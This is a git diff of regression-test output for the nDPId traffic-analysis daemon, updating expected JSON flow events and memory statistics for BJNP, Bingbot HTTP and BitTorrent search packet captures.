+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467725385125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385125,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467725385329,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385329,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1467725385329} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -49,9 +49,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879273 bytes -~~ total memory freed........: 5879273 bytes -~~ total allocations/frees...: 118160/118160 +~~ total memory allocated....: 6012907 bytes +~~ total memory freed........: 6012907 bytes +~~ total allocations/frees...: 120922/120922 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 440 chars ~~ json string max len.......: 682 chars diff --git a/test/results/bot.pcap.out b/test/results/bot.pcap.out index d977743fe..c910d5a76 100644 --- a/test/results/bot.pcap.out +++ b/test/results/bot.pcap.out @@ -4,8 +4,8 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","packets-captured":402,"packets-processed":402,"total-skipped-flows":0,"total-l4-payload-len":407096,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1645108245896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 402/402 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881323 bytes -~~ total memory freed........: 5881323 bytes -~~ total allocations/frees...: 118521/118521 +~~ total memory allocated....: 6014957 bytes +~~ total memory freed........: 6014957 bytes +~~ total allocations/frees...: 121283/121283 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 877 chars diff --git a/test/results/bt_search.pcap.out b/test/results/bt_search.pcap.out index 457d04fbd..b02c823c5 100644 --- a/test/results/bt_search.pcap.out +++ b/test/results/bt_search.pcap.out @@ -2,7 +2,7 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430752225251} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":200000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 